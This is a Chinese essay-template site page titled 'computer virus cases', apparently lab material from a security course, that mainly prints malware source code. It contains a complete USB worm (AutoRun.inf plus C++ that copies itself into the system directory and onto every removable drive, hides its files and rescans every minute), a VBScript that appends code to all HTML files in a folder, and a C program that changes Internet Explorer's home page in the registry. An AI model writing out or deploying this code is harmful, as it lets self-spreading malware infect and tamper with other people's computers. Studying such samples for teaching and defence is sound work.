当前位置:首页 >> 范文 >> 计算机病毒案例

计算机病毒案例

08-04

一、U 盘病毒

AutoRun.inf 文件

[AutoRun]

open=proj7_2.exe

shell\open=打开(&O)

shell\open\Command=proj7_2.exe

shell\explore=我的资源管理器(&X)

shell\\explore\\Command=proj7_2.exe

proj7_2.cpp

案例名称:U 盘恶意代码

程序名称:proj7_2.cpp

#include "stdafx.h"

bool SaveToFile(char* Path,char* Data){

HANDLE hFile;

hFile=CreateFile(Path, GENERIC_WRITE, 0, NULL,

CREATE_ALWAYS,

FILE_ATTRIBUTE_NORMAL,NULL);

if(hFile==INVALID_HANDLE_VALUE){/*continue; //出错时处理*/} DWORD dwWrite;

WriteFile(hFile,Data,strlen(Data),&dwWrite,NULL);

CloseHandle(hFile);

return true;

}

BOOL InfectU()

{

while(true)

{

UINT revtype;

char name[256]="H:\\" ;

char szName[256]={0};

char toPath[256]={0};

char infPath[256]={0};

char openU[80]={0};

//遍历所有盘符

for(BYTE i=0x42;i

{

name[0]=i;

//得到盘符类型

revtype=GetDriveType(name);

//判断是否是可移动存储设备

if (revtype==DRIVE_REMOVABLE)

{

//得到自身文件路径

GetModuleFileName(NULL,szName,256);

//比较是否和U 盘的盘符相同

//如果相同说明在U 盘上执行,复制到系统中去

if(strncmp(name,szName,1)==0)

{

//得到系统目录

GetSystemDirectory(toPath,256);

strcat(toPath,"\\proj7_2.exe");

//把自身文件复制到系统目录

if(CopyFile(szName,toPath,TRUE))

{

//运行程序

WinExec(toPath,0);

}

strcpy(openU,"explorer ");

strcat(openU,name);

//打开U 盘

WinExec(openU,1);

return 0;

}//如果不是在U 盘上执行,则感染U 盘

else

{

strcpy(toPath,name);

strcat(toPath,"\\proj7_2.exe");

strcpy(infPath,name);

strcat(infPath,"\\AutoRun.inf");

//还原U 盘上的文件属性

SetFileAttributes(toPath,FILE_ATTRIBUTE_NORMAL);

SetFileAttributes(infPath,FILE_ATTRIBUTE_NORMAL);

//删除原有文件

DeleteFile(toPath);

DeleteFile(infPath);

//写AutoRun.inf 到U 盘

char* Data;

Data = "[AutoRun]\r\nopen=proj7_2.exe\r\nshell\\open= 打开 (&O)\r\nshell\\explore=我的资源管理器

(&X)\r\nshell\\explore\\Command=proj7_2.exe";

SaveToFile(infPath,Data);

//拷贝自身文件到U 盘

CopyFile(szName,toPath,FALSE);

//把这两个文件设置成系统,隐藏属性

SetFileAttributes(toPath,

FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM); SetFileAttributes(infPath,

FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM); }

}

}

//休眠60 秒,60 检测一次

Sleep(60000);

}

}

int APIENTRY WinMain(HINSTANCE hInstance,

HINSTANCE hPrevInstance,

LPSTR lpCmdLine,

int nCmdShow)

{

InfectU();

return 0;

}

二、脚本病毒

案例名称:脚本病毒

程序名称:Misery.vbs

' 遇到错误继续执行

On error resume next

' 遇到错误继续执行

On error resume next

' 定义变量

Dim fso,curfolder,curfile

' 定一个文件操作对象

Set fso = createobject("scripting.filesystemobject")

' 得到当前目录

Set curfolder = fso.GetFolder(".")

' 得到当前目录的文件

set files = curfolder.files

' 文件的打开方式

Const ForReading = 1, ForWriting = 2, ForAppending = 8

' 向所有扩展名为htm/HTM/html/HTML 的文件中写代码

for each file in Files

if UCase(right(file.name,3)) = "HTM" or UCase(right(file.name,4)) = "HTML" then

curfile = curfolder & "\" & file.name

Set f = fso.OpenTextFile(curfile, ForAppending, True)

f.Write vbcrlf

f.Write ""

end if

next

f.Close

三、案例名称:浏览器恶意代码

程序名称:proj7_1.cpp

#include

#include

main()

{

HKEY hKey1;

DWORD dwDisposition;

LONG lRetCode;

//创建

lRetCode = RegCreateKeyEx ( HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Internet Explorer\\Main",

0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE, NULL, &hKey1, &dwDisposition);

//如果创建失败,显示出错信息

if (lRetCode != ERROR_SUCCESS){

printf ("Error in creating key\n");

return (0) ;

}

//设置键值

lRetCode = RegSetValueEx ( hKey1,

"Default_Page_URL",

0,

REG_SZ,

(byte*)"http://www.sina.com.cn",

100);

//如果创建失败,显示出错信息

if (lRetCode != ERROR_SUCCESS) {

printf ( "Error in setting value\n");

return (0) ;

}

printf("注册表编写成功!\n");

return(0);

}


    与《计算机病毒案例》相关的范文

  • 12-10 高年级计算能力的提高-个人特色教学课题研究计划

    • 高年级计算能力的提高-个人特色教学课题研究计划 一、为什么要开展本研究(即研究的目的、意义、价值): 1、培养学生的计算能力是小学数学教学的一项重要任务,是学生今后学习数学的重要基础。据平时检测和期末考试的质量分析情况看,学生的计算能力普遍较低,无疑给学生的学习发展造成了巨大障碍。要迅速有效地提高学生的计算能力,更好地发展学生的思维,大面积地提高数学教学质量,在小学数学教学中就必须以加强计算教学作 ...

  • 02-11 公司岗位能手事迹材料

    • 现年34岁的xxx,是*县网通分公司宽带维护员。作为一名普通的网络维护人员,他热爱本职工作,坚守信念,兢兢业业,在平凡的工作岗位上实现自己不平凡的人生信念。几年来,他维护岗位上潜心钻研网络业务技术、计算机终端及宽带维护等专业知识,不断进取,孜孜以求,勤于动手,用青春和智慧攻克了工作中许多技术难题。特别是在公司网络维护及优化工作中,他善于思考,勤勉刻苦,能够理论联系实际提出了许多合理化科学的建议,用 ...

  • 03-01 网通公司岗位能手先进事迹

    •   青   春   在   岗   位   上   闪   光   现年34岁的余孝逵,是新县网通分公司宽带维护员。作为一名普通的网络维护人员,他热爱本职工作,坚守信念,兢兢业业,在平凡的工作岗位上实现自己不平凡的人生信念。几年来,他维护岗位上潜心钻研网络业务技术、计算机终端及宽带维护等专业知识,不断进取,孜孜以求,勤于动手,用青春和智慧攻克了工作中许多技术难题。特别是在公司网络维护及优化工作中, ...

  • 08-07 青春在岗位上闪光(网通公司岗位能手先进事迹)

    •   现年34岁的xxx,是新县网通分公司宽带维护员。作为一名普通的网络维护人员,他热爱本职工作,坚守信念,兢兢业业,在平凡的工作岗位上实现自己不平凡的人生信念。几年来,他维护岗位上潜心钻研网络业务技术、计算机终端及宽带维护等专业知识,不断进取,孜孜以求,勤于动手,用青春和智慧攻克了工作中许多技术难题。特别是在公司网络维护及优化工作中,他善于思考,勤勉刻苦,能够理论联系实际提出了许多合理化科学的建议 ...

  • 09-12 2014年度数学组教研工作总结

    • 一年一度秋风劲,转眼间,一学期的教育教学工作已近尾声,回顾这一学期我们数学教研组的工作,可以说紧张忙碌而收获多多。全体数学组的教师,在教导处领导的关心和帮助下顺利而有序地完成了一系列工作,现就本学期开展的工作做如下总结: 一、加大教学常规管理的力度,扎实有效地开展教学工作 1、本学期,教研组进一步强化了课堂教学常规管理要求,使备课、上课、质量检测、作业批改、辅导学生等各环节都符合规范化的教学要求。 ...

  • 09-16 特长诊断课.赛课阶段性工作总结

    • 特长诊断课、赛课阶段性工作总结 尊敬的各位领导,老师们,下午好: 学校的中心工作是教学工作,教学质量是学校的生命。一年来,我们特长部在校领导高度重视下,在校教研室、课改办的指导和帮助下,以教学工作为中心,以深化课程改革为契机,在新学期全面推行特长新课改的教学探究工作中,力求摸索、制定了多种适合四中特长发展的教学模块。 9月初,特长办按照学校制定的教学目标组建了新课改诊断课工作组,推行课改探究教学活 ...

  • 06-15 嘉祥镇中学教科研培训工作计划

    • 一、指导思想: 在县教科室的指导下,在校长的直接领导和全体教师的参与下,坚持以科学发展观为统领,以全面推进课改、增强学校核心竞争力为中心和“科研兴校”的目标而努力工作,认真学习教育教学理论,进一步强化广大教师的科研意识,提高教师的群体科研素质和质量,充分发挥教科研的引领功能,全面提高教科研的实效性,联系实际,启动各学科“草根式”课题的研究实践,并按期完成研究任务。为全面提升我校的办学水平和教育质量 ...

  • 06-26 网络传媒系工作总结

    • 网络传媒系工作总结 时光飞逝,一个学期过去了,回顾这一年所从事的教学工作,总的说来是比较顺利地完成任务。在工作中我享受到收获的喜悦,当然也发现一些问题。现将本学年工作情况总结如下: 在思想方面,本人能积极参加政治学习,关心国家大事,拥护党中央的正确领导,坚持四项基本原则,拥护党的各项方针政策,遵守劳动纪律,团结同志;教育目的明确,态度端正,钻研业务,勤奋刻苦。 从教学上讲我主要做了这样一些工作: ...

  • 12-31 王阜庄小学现代远程教育资源库建设实施方案

    • 王阜庄小学 现代远程教育资源库建设实施方案 为发挥我校农村中小学现代远程教育的优势,在全校营造更加浓厚的教育现代化、信息化氛围,我校决定在20XX年,全面加强我校教育教学资源库的建设工作,使远程教育资源真正融入到教育教学工作当中。为落实好各项工作任务,特制定本实施方案。 一、工作目标 各校要整合各级、各类优质教育教学资源,搭建多层次、智能化的开放式教育平台,逐步建设具有一定规模、符合本地实际的资源 ...

  • 12-16 优秀教师研修班培训感言

    • 优秀教师研修班培训感言 一、困惑与欣喜 今年来东师大学习,是带着一颗好学的心来的,也是有重点的学习和理解。关于生成性的问题,一直以来困扰着我,在开展有关课堂教学研讨活动中,也经常提到“生成性”问题,可到底什么是课堂的生成性?如何把握课堂生成性?生成性的特点、功能是怎样的?都不是很明白,有时只肤浅地把“生成”理解为就是预设中没有的,课堂中出现的问题或突发事件。听了东北师大教育科学学院博士生导师陈旭远 ...

随机推荐
猜你喜欢

© 2024 范文中心 fw.geren-jianli.org | 点这里联系我们删除文章